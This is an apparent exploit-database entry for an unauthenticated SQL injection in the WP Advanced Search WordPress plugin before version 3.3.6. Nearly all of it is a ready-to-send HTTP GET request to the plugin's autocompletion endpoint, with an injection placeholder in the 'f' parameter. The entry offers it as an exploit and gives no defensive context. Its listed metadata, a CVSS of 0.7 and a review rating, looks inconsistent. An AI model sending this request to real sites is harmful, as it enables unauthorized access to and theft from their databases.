Exploit for WP Advanced Search < 3.3.6 - Unauthenticated SQL Injection

Name: Exploit for WP Advanced Search < 3.3.6 - Unauthenticated SQL Injection
Rating: 5 (153 reviews)

2020-04-02 | CVSS 0.7

## https://sploitus.com/exploit?id=WPEX-ID:136E1010-2F1B-4D09-B251-10DB01AB72F1
GET /wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_autosuggest&f=[INJECT]&type=&e= HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1